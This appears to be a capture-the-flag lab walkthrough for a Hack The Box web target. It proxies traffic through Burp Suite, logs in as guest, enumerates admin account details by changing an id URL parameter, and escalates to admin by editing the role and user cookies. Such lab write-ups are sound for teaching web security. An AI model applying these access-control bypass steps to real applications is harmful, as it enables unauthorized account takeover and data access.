PARAMETER MANIPULATION & COOKIE TAMPERING

#walk the application
root@htb:~$ BROWSER > {targetSite:port}
 Services
 We provide services to operate manufacturing data such as quotes, 
 customer requests etc. Please login to get access to the service.

 * no visible login page identified
#enumerate the webapp's directories and pages, either by fuzzing or by crawling
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
 Search: Proxy
 
root@oco:~$ BROWSER > Network Settings > Settings
 Configure Proxy Access to the Internet
  Manual Proxy Configuration: enabled
  HTTP Proxy: 127.0.0.1
  Port: 8080 {default Burp listening port}
  Also Use this Proxy for HTTPS: enabled
  
 * it is advisable to also check the "Also use this proxy for FTP and HTTPS" option so that all requests go through Burp Suite
 
step 2: disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
 Intercept is on: disabled

 * Burp's intercept is enabled by default
 
step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}

 * can also simply refresh the page if already on the target site
 
step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...
 http://10.129.203.93
  -> /
  -> cdn-cgi
      -> login
          -> script.js
  -> css
  -> js
  -> themes
#identification
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest

 * can also brute force the page
 * identify possible entry points on the webapp
    - Account page
       Access ID	Name	Email
       2233	guest	[email protected]
    - Uploads page; this requires admin privileges
    
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     guest  ...
 user     2233   ...

root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link
 http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 
 * the guest account ID is exposed in the URL; the admin ID can be enumerated by changing the id value manually or through automated means
#enumeration
root@htb:~$ BROWSER > http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 Access ID	Name	Email
 34322	admin	[email protected]

  * enumerate the admin account by changing the id value until the admin entry is found
     - admin info identified
     
#exploit via changing the cookie value (the application trusts the client-supplied role and user cookies for authorization)
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     admin   ...
 user     34322   ...

 * reload the page to escalate privilege to admin  
